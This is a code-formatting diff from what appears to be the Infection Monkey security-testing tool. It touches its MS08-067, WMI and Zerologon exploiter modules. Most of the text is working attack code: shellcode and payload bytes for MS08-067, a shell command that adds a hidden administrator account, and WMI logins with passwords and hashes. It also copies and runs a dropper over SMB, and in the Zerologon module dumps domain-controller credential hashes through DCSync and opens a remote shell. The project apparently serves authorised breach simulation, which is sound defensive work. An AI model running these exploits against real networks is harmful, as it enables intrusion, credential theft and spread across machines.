"\x43\x43\x43\x43\x43\x43\x43\x43" +PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43" +PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43" +PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43" +PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43" +PAYLOAD_2000 += "\xeb\xcc" +PAYLOAD_2000 += "\x00\x00" # Payload for Windows 2003[SP2] target -PAYLOAD_2003 = '\x41\x00\x5c\x00' -PAYLOAD_2003 += '\x2e\x00\x2e\x00\x5c\x00\x2e\x00' -PAYLOAD_2003 += '\x2e\x00\x5c\x00\x0a\x32\xbb\x77' -PAYLOAD_2003 += '\x8b\xc4\x66\x05\x60\x04\x8b\x00' -PAYLOAD_2003 += '\x50\xff\xd6\xff\xe0\x42\x84\xae' -PAYLOAD_2003 += '\xbb\x77\xff\xff\xff\xff\x01\x00' -PAYLOAD_2003 += '\x01\x00\x01\x00\x01\x00\x43\x43' -PAYLOAD_2003 += '\x43\x43\x37\x48\xbb\x77\xf5\xff' -PAYLOAD_2003 += '\xff\xff\xd1\x29\xbc\x77\xf4\x75' -PAYLOAD_2003 += '\xbd\x77\x44\x44\x44\x44\x9e\xf5' -PAYLOAD_2003 += '\xbb\x77\x54\x13\xbf\x77\x37\xc6' -PAYLOAD_2003 += '\xba\x77\xf9\x75\xbd\x77\x00\x00' +PAYLOAD_2003 = "\x41\x00\x5c\x00" +PAYLOAD_2003 += "\x2e\x00\x2e\x00\x5c\x00\x2e\x00" +PAYLOAD_2003 += "\x2e\x00\x5c\x00\x0a\x32\xbb\x77" +PAYLOAD_2003 += "\x8b\xc4\x66\x05\x60\x04\x8b\x00" +PAYLOAD_2003 += "\x50\xff\xd6\xff\xe0\x42\x84\xae" +PAYLOAD_2003 += "\xbb\x77\xff\xff\xff\xff\x01\x00" +PAYLOAD_2003 += "\x01\x00\x01\x00\x01\x00\x43\x43" +PAYLOAD_2003 += "\x43\x43\x37\x48\xbb\x77\xf5\xff" +PAYLOAD_2003 += "\xff\xff\xd1\x29\xbc\x77\xf4\x75" +PAYLOAD_2003 += "\xbd\x77\x44\x44\x44\x44\x9e\xf5" +PAYLOAD_2003 += "\xbb\x77\x54\x13\xbf\x77\x37\xc6" +PAYLOAD_2003 += "\xba\x77\xf9\x75\xbd\x77\x00\x00" class WindowsVersion(IntEnum): @@ -141,10 +149,10 @@ class SRVSVC_Exploit(object): LOG.debug("Connected to %s", target_rpc_name) self._dce = self._trans.DCERPC_class(self._trans) - self._dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0'))) + self._dce.bind(uuid.uuidtup_to_bin(("4b324fc8-1670-01d3-1278-5a47bf6ee188", "3.0"))) dce_packet = self._build_dce_packet() - self._dce.call(0x1f, dce_packet) # 0x1f (or 31)- NetPathCanonicalize Operation + self._dce.call(0x1F, dce_packet) # 0x1f (or 31)- NetPathCanonicalize Operation LOG.debug("Exploit sent to %s successfully...", self._target) LOG.debug("Target machine should be listening over port %d now", self.get_telnet_port()) @@ -157,52 +165,57 @@ class SRVSVC_Exploit(object): if self.os_version == WindowsVersion.WindowsXP: return XP_PACKET # Constructing Malicious Packet - dce_packet = '\x01\x00\x00\x00' - dce_packet += '\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00' + dce_packet = "\x01\x00\x00\x00" + dce_packet += "\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00" dce_packet += SHELLCODE - dce_packet += '\x41\x41\x41\x41\x41\x41\x41\x41' - dce_packet += '\x41\x41\x41\x41\x41\x41\x41\x41' - dce_packet += '\x41\x41\x41\x41\x41\x41\x41\x41' - dce_packet += '\x41\x41\x41\x41\x41\x41\x41\x41' - dce_packet += '\x41\x41\x41\x41\x41\x41\x41\x41' - dce_packet += '\x41\x41\x41\x41\x41\x41\x41\x41' - dce_packet += '\x41\x41\x41\x41\x41\x41\x41\x41' - dce_packet += '\x41\x41\x41\x41\x41\x41\x41\x41' - dce_packet += '\x00\x00\x00\x00' - dce_packet += '\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00' + dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" + dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" + dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" + dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" + dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" + dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" + dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" + dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" + 
dce_packet += "\x00\x00\x00\x00" + dce_packet += "\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00" dce_packet += self._payload - dce_packet += '\x00\x00\x00\x00' - dce_packet += '\x02\x00\x00\x00\x02\x00\x00\x00' - dce_packet += '\x00\x00\x00\x00\x02\x00\x00\x00' - dce_packet += '\x5c\x00\x00\x00\x01\x00\x00\x00' - dce_packet += '\x01\x00\x00\x00' + dce_packet += "\x00\x00\x00\x00" + dce_packet += "\x02\x00\x00\x00\x02\x00\x00\x00" + dce_packet += "\x00\x00\x00\x00\x02\x00\x00\x00" + dce_packet += "\x5c\x00\x00\x00\x01\x00\x00\x00" + dce_packet += "\x01\x00\x00\x00" return dce_packet class Ms08_067_Exploiter(HostExploiter): - _TARGET_OS_TYPE = ['windows'] - _EXPLOITED_SERVICE = 'Microsoft Server Service' - _windows_versions = {'Windows Server 2003 3790 Service Pack 2': WindowsVersion.Windows2003_SP2, - 'Windows Server 2003 R2 3790 Service Pack 2': WindowsVersion.Windows2003_SP2, - 'Windows 5.1': WindowsVersion.WindowsXP} + _TARGET_OS_TYPE = ["windows"] + _EXPLOITED_SERVICE = "Microsoft Server Service" + _windows_versions = { + "Windows Server 2003 3790 Service Pack 2": WindowsVersion.Windows2003_SP2, + "Windows Server 2003 R2 3790 Service Pack 2": WindowsVersion.Windows2003_SP2, + "Windows 5.1": WindowsVersion.WindowsXP, + } def __init__(self, host): super(Ms08_067_Exploiter, self).__init__(host) def is_os_supported(self): - if self.host.os.get('type') in self._TARGET_OS_TYPE and \ - self.host.os.get('version') in list(self._windows_versions.keys()): + if self.host.os.get("type") in self._TARGET_OS_TYPE and self.host.os.get("version") in list( + self._windows_versions.keys() + ): return True - if not self.host.os.get('type') or ( - self.host.os.get('type') in self._TARGET_OS_TYPE and not self.host.os.get('version')): + if not self.host.os.get("type") or ( + self.host.os.get("type") in self._TARGET_OS_TYPE and not self.host.os.get("version") + ): is_smb_open, _ = check_tcp_port(self.host.ip_addr, 445) if is_smb_open: smb_finger = SMBFinger() if smb_finger.get_host_fingerprint(self.host): - return self.host.os.get('type') in self._TARGET_OS_TYPE and \ - self.host.os.get('version') in list(self._windows_versions.keys()) + return self.host.os.get("type") in self._TARGET_OS_TYPE and self.host.os.get( + "version" + ) in list(self._windows_versions.keys()) return False def _exploit_host(self): @@ -212,7 +225,9 @@ class Ms08_067_Exploiter(HostExploiter): LOG.info("Can't find suitable monkey executable for host %r", self.host) return False - os_version = self._windows_versions.get(self.host.os.get('version'), WindowsVersion.Windows2003_SP2) + os_version = self._windows_versions.get( + self.host.os.get("version"), WindowsVersion.Windows2003_SP2 + ) exploited = False for _ in range(self._config.ms08_067_exploit_attempts): @@ -221,11 +236,14 @@ class Ms08_067_Exploiter(HostExploiter): try: sock = exploit.start() - sock.send("cmd /c (net user {} {} /add) &&" - " (net localgroup administrators {} /add)\r\n".format( - self._config.user_to_add, - self._config.remote_user_pass, - self._config.user_to_add).encode()) + sock.send( + "cmd /c (net user {} {} /add) &&" + " (net localgroup administrators {} /add)\r\n".format( + self._config.user_to_add, + self._config.remote_user_pass, + self._config.user_to_add, + ).encode() + ) time.sleep(2) sock.recv(1000) @@ -241,20 +259,24 @@ class Ms08_067_Exploiter(HostExploiter): return False # copy the file remotely using SMB - remote_full_path = SmbTools.copy_file(self.host, - src_path, - self._config.dropper_target_path_win_32, - self._config.user_to_add, - 
self._config.remote_user_pass) + remote_full_path = SmbTools.copy_file( + self.host, + src_path, + self._config.dropper_target_path_win_32, + self._config.user_to_add, + self._config.remote_user_pass, + ) if not remote_full_path: # try other passwords for administrator for password in self._config.exploit_password_list: - remote_full_path = SmbTools.copy_file(self.host, - src_path, - self._config.dropper_target_path_win_32, - "Administrator", - password) + remote_full_path = SmbTools.copy_file( + self.host, + src_path, + self._config.dropper_target_path_win_32, + "Administrator", + password, + ) if remote_full_path: break @@ -263,16 +285,20 @@ class Ms08_067_Exploiter(HostExploiter): # execute the remote dropper in case the path isn't final if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower(): - cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \ - build_monkey_commandline(self.host, - get_monkey_depth() - 1, - SRVSVC_Exploit.TELNET_PORT, - self._config.dropper_target_path_win_32) + cmdline = DROPPER_CMDLINE_WINDOWS % { + "dropper_path": remote_full_path + } + build_monkey_commandline( + self.host, + get_monkey_depth() - 1, + SRVSVC_Exploit.TELNET_PORT, + self._config.dropper_target_path_win_32, + ) else: - cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \ - build_monkey_commandline(self.host, - get_monkey_depth() - 1, - vulnerable_port=SRVSVC_Exploit.TELNET_PORT) + cmdline = MONKEY_CMDLINE_WINDOWS % { + "monkey_path": remote_full_path + } + build_monkey_commandline( + self.host, get_monkey_depth() - 1, vulnerable_port=SRVSVC_Exploit.TELNET_PORT + ) try: sock.send(("start %s\r\n" % (cmdline,)).encode()) @@ -286,7 +312,11 @@ class Ms08_067_Exploiter(HostExploiter): except socket.error: pass - LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", - remote_full_path, self.host, cmdline) + LOG.info( + "Executed monkey '%s' on remote victim %r (cmdline=%r)", + remote_full_path, + self.host, + cmdline, + ) return True diff --git a/monkey/infection_monkey/exploit/wmiexec.py b/monkey/infection_monkey/exploit/wmiexec.py index 348fd230c..7120f5720 100644 --- a/monkey/infection_monkey/exploit/wmiexec.py +++ b/monkey/infection_monkey/exploit/wmiexec.py @@ -7,7 +7,11 @@ from impacket.dcerpc.v5.rpcrt import DCERPCException from common.utils.exploit_enum import ExploitType from infection_monkey.exploit.HostExploiter import HostExploiter -from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey +from infection_monkey.exploit.tools.helpers import ( + build_monkey_commandline, + get_monkey_depth, + get_target_monkey, +) from infection_monkey.exploit.tools.smb_tools import SmbTools from infection_monkey.exploit.tools.wmi_tools import AccessDeniedException, WmiTools from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS @@ -16,9 +20,9 @@ LOG = logging.getLogger(__name__) class WmiExploiter(HostExploiter): - _TARGET_OS_TYPE = ['windows'] + _TARGET_OS_TYPE = ["windows"] EXPLOIT_TYPE = ExploitType.BRUTE_FORCE - _EXPLOITED_SERVICE = 'WMI (Windows Management Instrumentation)' + _EXPLOITED_SERVICE = "WMI (Windows Management Instrumentation)" VULNERABLE_PORT = 135 def __init__(self, host): @@ -38,8 +42,10 @@ class WmiExploiter(HostExploiter): password_hashed = self._config.hash_sensitive_data(password) lm_hash_hashed = self._config.hash_sensitive_data(lm_hash) ntlm_hash_hashed = self._config.hash_sensitive_data(ntlm_hash) - creds_for_logging = "user, 
password (SHA-512), lm hash (SHA-512), ntlm hash (SHA-512): " \ - "({},{},{},{})".format(user, password_hashed, lm_hash_hashed, ntlm_hash_hashed) + creds_for_logging = ( + "user, password (SHA-512), lm hash (SHA-512), ntlm hash (SHA-512): " + "({},{},{},{})".format(user, password_hashed, lm_hash_hashed, ntlm_hash_hashed) + ) LOG.debug(("Attempting to connect %r using WMI with " % self.host) + creds_for_logging) wmi_connection = WmiTools.WmiConnection() @@ -48,14 +54,20 @@ class WmiExploiter(HostExploiter): wmi_connection.connect(self.host, user, password, None, lm_hash, ntlm_hash) except AccessDeniedException: self.report_login_attempt(False, user, password, lm_hash, ntlm_hash) - LOG.debug(("Failed connecting to %r using WMI with " % self.host) + creds_for_logging) + LOG.debug( + ("Failed connecting to %r using WMI with " % self.host) + creds_for_logging + ) continue except DCERPCException: self.report_login_attempt(False, user, password, lm_hash, ntlm_hash) - LOG.debug(("Failed connecting to %r using WMI with " % self.host) + creds_for_logging) + LOG.debug( + ("Failed connecting to %r using WMI with " % self.host) + creds_for_logging + ) continue except socket.error: - LOG.debug(("Network error in WMI connection to %r with " % self.host) + creds_for_logging) + LOG.debug( + ("Network error in WMI connection to %r with " % self.host) + creds_for_logging + ) return False except Exception as exc: LOG.debug( @@ -68,9 +80,12 @@ class WmiExploiter(HostExploiter): self.report_login_attempt(True, user, password, lm_hash, ntlm_hash) # query process list and check if monkey already running on victim - process_list = WmiTools.list_object(wmi_connection, "Win32_Process", - fields=("Caption",), - where="Name='%s'" % ntpath.split(src_path)[-1]) + process_list = WmiTools.list_object( + wmi_connection, + "Win32_Process", + fields=("Caption",), + where="Name='%s'" % ntpath.split(src_path)[-1], + ) if process_list: wmi_connection.close() @@ -78,45 +93,62 @@ class WmiExploiter(HostExploiter): return False # copy the file remotely using SMB - remote_full_path = SmbTools.copy_file(self.host, - src_path, - self._config.dropper_target_path_win_32, - user, - password, - lm_hash, - ntlm_hash, - self._config.smb_download_timeout) + remote_full_path = SmbTools.copy_file( + self.host, + src_path, + self._config.dropper_target_path_win_32, + user, + password, + lm_hash, + ntlm_hash, + self._config.smb_download_timeout, + ) if not remote_full_path: wmi_connection.close() return False # execute the remote dropper in case the path isn't final elif remote_full_path.lower() != self._config.dropper_target_path_win_32.lower(): - cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \ - build_monkey_commandline(self.host, - get_monkey_depth() - 1, - WmiExploiter.VULNERABLE_PORT, - self._config.dropper_target_path_win_32) + cmdline = DROPPER_CMDLINE_WINDOWS % { + "dropper_path": remote_full_path + } + build_monkey_commandline( + self.host, + get_monkey_depth() - 1, + WmiExploiter.VULNERABLE_PORT, + self._config.dropper_target_path_win_32, + ) else: - cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \ - build_monkey_commandline(self.host, - get_monkey_depth() - 1, - WmiExploiter.VULNERABLE_PORT) + cmdline = MONKEY_CMDLINE_WINDOWS % { + "monkey_path": remote_full_path + } + build_monkey_commandline( + self.host, get_monkey_depth() - 1, WmiExploiter.VULNERABLE_PORT + ) # execute the remote monkey - result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline, - 
ntpath.split(remote_full_path)[0], - None) + result = WmiTools.get_object(wmi_connection, "Win32_Process").Create( + cmdline, ntpath.split(remote_full_path)[0], None + ) if (0 != result.ProcessId) and (not result.ReturnValue): - LOG.info("Executed dropper '%s' on remote victim %r (pid=%d, cmdline=%r)", - remote_full_path, self.host, result.ProcessId, cmdline) + LOG.info( + "Executed dropper '%s' on remote victim %r (pid=%d, cmdline=%r)", + remote_full_path, + self.host, + result.ProcessId, + cmdline, + ) - self.add_vuln_port(port='unknown') + self.add_vuln_port(port="unknown") success = True else: - LOG.debug("Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)", - remote_full_path, self.host, result.ProcessId, result.ReturnValue, cmdline) + LOG.debug( + "Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)", + remote_full_path, + self.host, + result.ProcessId, + result.ReturnValue, + cmdline, + ) success = False result.RemRelease() diff --git a/monkey/infection_monkey/exploit/zerologon.py b/monkey/infection_monkey/exploit/zerologon.py index aa82d78c5..a30ceda2d 100644 --- a/monkey/infection_monkey/exploit/zerologon.py +++ b/monkey/infection_monkey/exploit/zerologon.py @@ -17,8 +17,7 @@ from common.utils.exploit_enum import ExploitType from infection_monkey.exploit.HostExploiter import HostExploiter from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets from infection_monkey.exploit.zerologon_utils.options import OptionsForSecretsdump -from infection_monkey.exploit.zerologon_utils.vuln_assessment import ( - get_dc_details, is_exploitable) +from infection_monkey.exploit.zerologon_utils.vuln_assessment import get_dc_details, is_exploitable from infection_monkey.exploit.zerologon_utils.wmiexec import Wmiexec from infection_monkey.utils.capture_output import StdoutCapture @@ -120,9 +119,7 @@ class ZerologonExploiter(HostExploiter): request["AccountName"] = dc_name + "$\x00" request["ComputerName"] = dc_name + "\x00" - request[ - "SecureChannelType" - ] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel + request["SecureChannelType"] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel request["Authenticator"] = authenticator def assess_exploit_attempt_result(self, exploit_attempt_result) -> bool: @@ -151,9 +148,7 @@ class ZerologonExploiter(HostExploiter): LOG.debug("DCSync; getting usernames and their passwords' hashes.") user_creds = self.get_all_user_creds() if not user_creds: - raise Exception( - "Couldn't extract any usernames and/or their passwords' hashes." - ) + raise Exception("Couldn't extract any usernames and/or their passwords' hashes.") # Use above extracted credentials to get original DC password's hashes. LOG.debug("Getting original DC password's NT hash.") @@ -165,15 +160,11 @@ class ZerologonExploiter(HostExploiter): user_details[1]["nt_hash"], ] try: - original_pwd_nthash = self.get_original_pwd_nthash( - username, user_pwd_hashes - ) + original_pwd_nthash = self.get_original_pwd_nthash(username, user_pwd_hashes) if original_pwd_nthash: break except Exception as e: - LOG.info( - f"Credentials didn\'t work. Exception: {str(e)}" - ) + LOG.info(f"Credentials didn't work. Exception: {str(e)}") if not original_pwd_nthash: raise Exception("Couldn't extract original DC password's NT hash.") @@ -187,9 +178,7 @@ class ZerologonExploiter(HostExploiter): # Start restoration attempts. 
LOG.debug("Attempting password restoration.") - _restored = self._send_restoration_rpc_login_requests( - rpc_con, original_pwd_nthash - ) + _restored = self._send_restoration_rpc_login_requests(rpc_con, original_pwd_nthash) if not _restored: raise Exception("Failed to restore password! Max attempts exceeded?") @@ -244,9 +233,7 @@ class ZerologonExploiter(HostExploiter): username: str = "", options: Optional[object] = None, ) -> List[str]: - dumper = DumpSecrets( - remote_name=remote_name, username=username, options=options - ) + dumper = DumpSecrets(remote_name=remote_name, username=username, options=options) dumped_secrets = dumper.dump().split("\n") return dumped_secrets @@ -280,9 +267,7 @@ class ZerologonExploiter(HostExploiter): self._extracted_creds[user]["nt_hash"], ) - def add_extracted_creds_to_exploit_info( - self, user: str, lmhash: str, nthash: str - ) -> None: + def add_extracted_creds_to_exploit_info(self, user: str, lmhash: str, nthash: str) -> None: self.exploit_info["credentials"].update( { user: { @@ -295,9 +280,7 @@ class ZerologonExploiter(HostExploiter): ) # so other exploiters can use these creds - def add_extracted_creds_to_monkey_config( - self, user: str, lmhash: str, nthash: str - ) -> None: + def add_extracted_creds_to_monkey_config(self, user: str, lmhash: str, nthash: str) -> None: if user not in self._config.exploit_user_list: self._config.exploit_user_list.append(user) @@ -320,13 +303,9 @@ class ZerologonExploiter(HostExploiter): security=os.path.join(os.path.expanduser("~"), "monkey-security.save"), ) - dumped_secrets = self.get_dumped_secrets( - remote_name="LOCAL", options=options - ) + dumped_secrets = self.get_dumped_secrets(remote_name="LOCAL", options=options) for secret in dumped_secrets: - if ( - "$MACHINE.ACC: " in secret - ): # format of secret - "$MACHINE.ACC: lmhash:nthash" + if "$MACHINE.ACC: " in secret: # format of secret - "$MACHINE.ACC: lmhash:nthash" nthash = secret.split(":")[2] return nthash @@ -340,14 +319,14 @@ class ZerologonExploiter(HostExploiter): def save_HKLM_keys_locally(self, username: str, user_pwd_hashes: List[str]) -> bool: LOG.info( - f'Starting remote shell on victim with credentials:\n' - f'user: {username}\n' - f'hashes (SHA-512): {self._config.hash_sensitive_data(user_pwd_hashes[0])} : ' - f'{self._config.hash_sensitive_data(user_pwd_hashes[1])}' + f"Starting remote shell on victim with credentials:\n" + f"user: {username}\n" + f"hashes (SHA-512): {self._config.hash_sensitive_data(user_pwd_hashes[0])} : " + f"{self._config.hash_sensitive_data(user_pwd_hashes[1])}" ) wmiexec = Wmiexec( - ip=self.dc_ip, username=username, hashes=':'.join(user_pwd_hashes), domain=self.dc_ip + ip=self.dc_ip, username=username, hashes=":".join(user_pwd_hashes), domain=self.dc_ip ) remote_shell = wmiexec.get_remote_shell() @@ -391,21 +370,13 @@ class ZerologonExploiter(HostExploiter): try: os.remove(path) except Exception as e: - LOG.info( - f"Exception occurred while removing file {path} from system: {str(e)}" - ) + LOG.info(f"Exception occurred while removing file {path} from system: {str(e)}") - def _send_restoration_rpc_login_requests( - self, rpc_con, original_pwd_nthash - ) -> bool: + def _send_restoration_rpc_login_requests(self, rpc_con, original_pwd_nthash) -> bool: for _ in range(0, self.MAX_ATTEMPTS): - restoration_attempt_result = self.try_restoration_attempt( - rpc_con, original_pwd_nthash - ) + restoration_attempt_result = self.try_restoration_attempt(rpc_con, original_pwd_nthash) - is_restored = 
self.assess_restoration_attempt_result( - restoration_attempt_result - ) + is_restored = self.assess_restoration_attempt_result(restoration_attempt_result) if is_restored: return is_restored @@ -415,9 +386,7 @@ class ZerologonExploiter(HostExploiter): self, rpc_con: rpcrt.DCERPC_v5, original_pwd_nthash: str ) -> Optional[object]: try: - restoration_attempt_result = self.attempt_restoration( - rpc_con, original_pwd_nthash - ) + restoration_attempt_result = self.attempt_restoration(rpc_con, original_pwd_nthash) return restoration_attempt_result except nrpc.DCERPCSessionError as e: # Failure should be due to a STATUS_ACCESS_DENIED error. @@ -481,9 +450,7 @@ class ZerologonExploiter(HostExploiter): def assess_restoration_attempt_result(self, restoration_attempt_result) -> bool: if restoration_attempt_result: - LOG.debug( - "DC machine account password should be restored to its original value." - ) + LOG.debug("DC machine account password should be restored to its original value.") return True return False diff --git a/monkey/infection_monkey/exploit/zerologon_utils/dump_secrets.py b/monkey/infection_monkey/exploit/zerologon_utils/dump_secrets.py index b196528e7..9d2116d07 100644 --- a/monkey/infection_monkey/exploit/zerologon_utils/dump_secrets.py +++ b/monkey/infection_monkey/exploit/zerologon_utils/dump_secrets.py @@ -131,10 +131,7 @@ class DumpSecrets: try: self.connect() except Exception as e: - if ( - os.getenv("KRB5CCNAME") is not None - and self.__do_kerberos is True - ): + if os.getenv("KRB5CCNAME") is not None and self.__do_kerberos is True: # SMBConnection failed. That might be because there was no way to log into the # target system. We just have a last resort. Hope we have tickets cached and that they # will work diff --git a/monkey/infection_monkey/exploit/zerologon_utils/remote_shell.py b/monkey/infection_monkey/exploit/zerologon_utils/remote_shell.py index 146d58615..3b635f6b5 100644 --- a/monkey/infection_monkey/exploit/zerologon_utils/remote_shell.py +++ b/monkey/infection_monkey/exploit/zerologon_utils/remote_shell.py @@ -83,9 +83,7 @@ class RemoteShell(cmd.Cmd): newPath = ntpath.normpath(ntpath.join(self.__pwd, src_path)) drive, tail = ntpath.splitdrive(newPath) filename = ntpath.basename(tail) - local_file_path = os.path.join( - os.path.expanduser("~"), "monkey-" + filename - ) + local_file_path = os.path.join(os.path.expanduser("~"), "monkey-" + filename) fh = open(local_file_path, "wb") LOG.info("Downloading %s\\%s" % (drive, tail)) self.__transferClient.getFile(drive[:-1] + "$", tail, fh.write) @@ -148,9 +146,7 @@ class RemoteShell(cmd.Cmd): while True: try: - self.__transferClient.getFile( - self.__share, self.__output, output_callback - ) + self.__transferClient.getFile(self.__share, self.__output, output_callback) break except Exception as e: if str(e).find("STATUS_SHARING_VIOLATION") >= 0: @@ -166,9 +162,7 @@ class RemoteShell(cmd.Cmd): def execute_remote(self, data): command = self.__shell + data if self.__noOutput is False: - command += ( - " 1> " + "\\\\127.0.0.1\\%s" % self.__share + self.__output + " 2>&1" - ) + command += " 1> " + "\\\\127.0.0.1\\%s" % self.__share + self.__output + " 2>&1" self.__win32Process.Create(command, self.__pwd, None) self.get_output() diff --git a/monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py b/monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py index 3470dd39a..467c41d69 100644 --- a/monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py +++ 
b/monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py @@ -23,14 +23,15 @@ def _get_dc_name(dc_ip: str) -> str: """ nb = nmb.NetBIOS.NetBIOS() name = nb.queryIPForName( - ip=dc_ip, - timeout=MEDIUM_REQUEST_TIMEOUT + ip=dc_ip, timeout=MEDIUM_REQUEST_TIMEOUT ) # returns either a list of NetBIOS names or None if name: return name[0] else: - raise DomainControllerNameFetchError("Couldn't get domain controller's name, maybe it's on external network?") + raise DomainControllerNameFetchError( + "Couldn't get domain controller's name, maybe it's on external network?" + ) def is_exploitable(zerologon_exploiter_object) -> (bool, Optional[rpcrt.DCERPC_v5]): @@ -44,9 +45,7 @@ def is_exploitable(zerologon_exploiter_object) -> (bool, Optional[rpcrt.DCERPC_v # Try authenticating. for _ in range(0, zerologon_exploiter_object.MAX_ATTEMPTS): try: - rpc_con_auth_result = _try_zero_authenticate( - zerologon_exploiter_object, rpc_con - ) + rpc_con_auth_result = _try_zero_authenticate(zerologon_exploiter_object, rpc_con) if rpc_con_auth_result is not None: return True, rpc_con_auth_result except Exception as ex: @@ -56,9 +55,7 @@ def is_exploitable(zerologon_exploiter_object) -> (bool, Optional[rpcrt.DCERPC_v return False, None -def _try_zero_authenticate( - zerologon_exploiter_object, rpc_con: rpcrt.DCERPC_v5 -) -> rpcrt.DCERPC_v5: +def _try_zero_authenticate(zerologon_exploiter_object, rpc_con: rpcrt.DCERPC_v5) -> rpcrt.DCERPC_v5: plaintext = b"\x00" * 8 ciphertext = b"\x00" * 8 flags = 0x212FFFFF diff --git a/monkey/infection_monkey/exploit/zerologon_utils/wmiexec.py b/monkey/infection_monkey/exploit/zerologon_utils/wmiexec.py index 1beaafddd..2486998e4 100644 --- a/monkey/infection_monkey/exploit/zerologon_utils/wmiexec.py +++ b/monkey/infection_monkey/exploit/zerologon_utils/wmiexec.py @@ -95,9 +95,7 @@ class Wmiexec: wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login ) iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface) - self.iWbemServices = iWbemLevel1Login.NTLMLogin( - "//./root/cimv2", NULL, NULL - ) + self.iWbemServices = iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL) iWbemLevel1Login.RemRelease() except (Exception, KeyboardInterrupt) as e: diff --git a/monkey/infection_monkey/main.py b/monkey/infection_monkey/main.py index 945ccd8cf..e0c0eef08 100644 --- a/monkey/infection_monkey/main.py +++ b/monkey/infection_monkey/main.py @@ -17,29 +17,29 @@ from infection_monkey.model import DROPPER_ARG, MONKEY_ARG from infection_monkey.monkey import InfectionMonkey from infection_monkey.utils.monkey_log_path import get_dropper_log_path, get_monkey_log_path -__author__ = 'itamar' +__author__ = "itamar" LOG = None -LOG_CONFIG = {'version': 1, - 'disable_existing_loggers': False, - 'formatters': { - 'standard': { - 'format': - '%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s' - }, - }, - 'handlers': {'console': {'class': 'logging.StreamHandler', - 'level': 'DEBUG', - 'formatter': 'standard'}, - 'file': {'class': 'logging.FileHandler', - 'level': 'DEBUG', - 'formatter': 'standard', - 'filename': None} - }, - 'root': {'level': 'DEBUG', - 'handlers': ['console']}, - } +LOG_CONFIG = { + "version": 1, + "disable_existing_loggers": False, + "formatters": { + "standard": { + "format": "%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s" + }, + }, + "handlers": { + "console": {"class": "logging.StreamHandler", "level": "DEBUG", "formatter": "standard"}, + "file": { + "class": "logging.FileHandler", + 
"level": "DEBUG", + "formatter": "standard", + "filename": None, + }, + }, + "root": {"level": "DEBUG", "handlers": ["console"]}, +} def main(): @@ -56,7 +56,7 @@ def main(): config_file = EXTERNAL_CONFIG_FILE arg_parser = argparse.ArgumentParser() - arg_parser.add_argument('-c', '--config') + arg_parser.add_argument("-c", "--config") opts, monkey_args = arg_parser.parse_known_args(sys.argv[2:]) if opts.config: config_file = opts.config @@ -70,13 +70,22 @@ def main(): except ValueError as e: print("Error loading config: %s, using default" % (e,)) else: - print("Config file wasn't supplied and default path: %s wasn't found, using internal default" % (config_file,)) + print( + "Config file wasn't supplied and default path: %s wasn't found, using internal default" + % (config_file,) + ) - print("Loaded Configuration: %r" % WormConfiguration.hide_sensitive_info(WormConfiguration.as_dict())) + print( + "Loaded Configuration: %r" + % WormConfiguration.hide_sensitive_info(WormConfiguration.as_dict()) + ) # Make sure we're not in a machine that has the kill file - kill_path = os.path.expandvars( - WormConfiguration.kill_file_path_windows) if sys.platform == "win32" else WormConfiguration.kill_file_path_linux + kill_path = ( + os.path.expandvars(WormConfiguration.kill_file_path_windows) + if sys.platform == "win32" + else WormConfiguration.kill_file_path_linux + ) if os.path.exists(kill_path): print("Kill path found, finished run") return True @@ -101,23 +110,24 @@ def main(): os.remove(log_path) except OSError: pass - LOG_CONFIG['handlers']['file']['filename'] = log_path + LOG_CONFIG["handlers"]["file"]["filename"] = log_path # noinspection PyUnresolvedReferences - LOG_CONFIG['root']['handlers'].append('file') + LOG_CONFIG["root"]["handlers"].append("file") else: - del LOG_CONFIG['handlers']['file'] + del LOG_CONFIG["handlers"]["file"] logging.config.dictConfig(LOG_CONFIG) LOG = logging.getLogger() def log_uncaught_exceptions(ex_cls, ex, tb): - LOG.critical(''.join(traceback.format_tb(tb))) - LOG.critical('{0}: {1}'.format(ex_cls, ex)) + 